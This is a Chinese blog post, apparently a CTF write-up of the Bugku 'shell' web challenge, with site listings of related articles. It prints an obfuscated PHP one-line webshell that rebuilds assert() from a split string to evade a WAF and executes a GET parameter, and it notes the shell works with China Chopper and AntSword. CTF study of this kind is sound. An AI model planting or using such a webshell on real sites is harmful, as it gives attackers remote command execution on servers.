bugku-web-shell

最新推荐文章于 2024-05-12 14:23:18 发布
最新推荐文章于 2024-05-12 14:23:18 发布
阅读量276 收藏
点赞数 6
分类专栏: CTF靶场 文章标签: 前端 web安全 CTF 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75121443/article/details/137216024
版权

过狗一句话

$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])

这咋啥也没有呢
从提示的过狗一句话,猜测传参为s

这里居然是一个命令执行漏洞
两个文件
flaga15808abee46a1d5.txt
index.php
把这两个玩意都看一遍

在这里得到flag

在这里看到过狗一句话

这里的过狗一句话有点意思,可以直接以参数传参的形式构建命令执行漏洞,实现菜刀和蚁剑的远程连接功能

白牧羊人
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
spark-shell启动
04-28
本文档详细的介绍了spark的shell启动命令,具体细节等要求
bugku - Web
UP's blog
09-03 1894
刚刚入门CTF,如有错误,望大佬指教
wp-bugku-web-getshell
bin789456的博客
08-24 489
写在前面 本题主要知识点:含php混淆加密,webshell进阶绕过。 wp 打开题,非常乱的代码,隐约看得出是php代码,确定是php加密: 如果你想学习,什么是混淆加密或者为什么需要混淆加密,可以查看: 混淆加密详解 解密方法如下: 1.调试解密 2.在线解密:https://www.zhaoyuanma.com/phpjm.html 在线解密结果如下: 显然我们可以蚁剑连接了 连接后但只能访问当前目录 提示错误,权限不足,在终端中使用命令,也没啥反应。 很有可能是disable_function
BUGKU-WEB Simple_SSTI_1
天泽岁月
02-04 2057
BUGKU 第02题
BUGKU-WEB 文件包含
天泽岁月
02-22 1262
BUGKU-WEB 文件包含,PHP伪协议
BUGKU-WEB shell
天泽岁月
03-14 668
BUGKU-WEB shell ,PHP explode函数和assert函数理解
bugku-web-入门
PLpa的博客
06-07 814
前言: 两个月前做完bugkuweb入门题,一直没有什么时间总结,最近又在做buuctf的pwn题,抽出一点时间总结一下web。 1.web2 出来一张图片,我没直接F12,就能看到注释了的flag。 2.计算器 原本框中只能输入一位,我们F12后,改写js代码,输入正确结果即可得到flag。 3.web基础$_GET 题目给了php源代码,我们发现只要what为flag就可以得到flag了,所以我们就让what=flag。 4.web基础$_POST 与上题一样是给what传值,不过这次用的是PO
bugku-web-login2(SKCTF)
weixin_42444939的博客
08-29 822
login页面,日常先抓包康康 看样子这玩意儿也不会有啥回显 估计又要盲注(初步构想
bugku-web
qq_45414878的博客
11-03 146
bugku-web计算器矛盾web3域名解析你必须让他停下变量1web5 计算器 修改最大长度 矛盾 要求num不能为数字并且值要等于1,payload: ?num=1a web3 在源码中发现unicode编码 KEY{J2sa42ahJK-&#72
bugku-web-网站被黑
qq_75121443的博客
03-30 237
扫到留下了一个shell.php的文件。查看源码,没有发现太大的问题。爆破出密码为hack。
web-shell连接配置.rar
08-13
web-shell连接配置.rar,web浏览器直接访问控制台,通过用户名密码访问,ssl 安全配置
letter-shell
01-10
letter-shell
mysql-shell-8.0.18-windows-x86-64bit.zip
01-12
mysql-shell-8.0.18-windows-x86-64bit.zip MySQL Shell is an advanced command-line client and code editor for MySQL. In addition to SQL, MySQL Shell also offers scripting capabilities for JavaScript ...
k-shell分解算法
05-25
K-shell 分解方法给出了节点重要性的一种粗粒化的划分。 其基本思想如下,假设边缘节点的 K-shell值为 1,然后往内一层层进入网络的核心,先去除网络 中度值等于 1 的所有节点以及连边。 若剩下的节点里面,仍有度值...
可视化大屏比例
梦寻汝的博客
05-08 160
【代码】可视化大屏比例。
TypeScript 类型系统深度解析:类型全览
逐星的博客
05-09 1117
TypeScript 提供了丰富的类型系统,允许开发者以静态方式定义和使用数据类型。这不仅提升了代码的安全性,还增强了代码的可读性和可维护性。
picoCTF-Web Exploitation-Web Gauntlet
最新发布
huckers的博客
05-12 372
按照提示,需要用admin登录,查看filter.php,这应该是一个SQL注入题,提示我们可以使用无痕浏览器来以便cookie可以不用每次清除。中展示了sql过滤逻辑,可以回味一下,尝试用不同的关键字来注入。提示sql过滤or,我们使用。
rbac权限和多级请假设计的流程演示和前端页面实现
m0_54597180的博客
05-09 298
多级请假:7级及以下申请请假需要部门经理审核,若是请假时长超过72小时,则需要总经理审核,7级申请请将需要总经理审核,总经理请假自动审核通过。业务流程测试:王美美[高级研发工程师](7级以下用户)登录并申请请假(超过了72小时需要部门经理和总经理申请)部门经理审核通过,需要总经理审核(8级)登录,首页消息通知审核通过。如果部门经理审核不通过,则总经理不需要处理也没有系统通知。王美美请假(查过72小时),需要部门经理和总经理审核。部门经理(7级)登录消息通知审核消息并处理审核。王美美查看部门经理审核结果。
spark-shell web页面
07-27
Spark-shell web页面是Spark Shell的一个交互式web用户界面,可以通过浏览器访问并与Spark进行交互。它提供了一个简单易用的界面,可以执行Spark代码,查看执行结果,并监控正在运行的作业的状态。 要启动Spark-shell web页面,可以使用以下命令: ``` spark-shell --master local[*] --conf spark.ui.reverseProxy=true --conf spark.ui.reverseProxyUrl=http://localhost:4040 ``` 这将在本地启动Spark-shell,并将web页面绑定到localhost的4040端口。 然后,您可以在浏览器中访问`http://localhost:4040`来打开Spark-shell web页面。在这个页面上,您可以看到Spark应用程序的概要信息,包括正在运行的作业、任务和资源使用情况等。您还可以执行Spark代码片段,查看结果和日志信息。 请注意,启动Spark-shell web页面需要确保本地没有其他进程占用4040端口。如果该端口已被占用,您可以尝试使用其他可用的端口。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值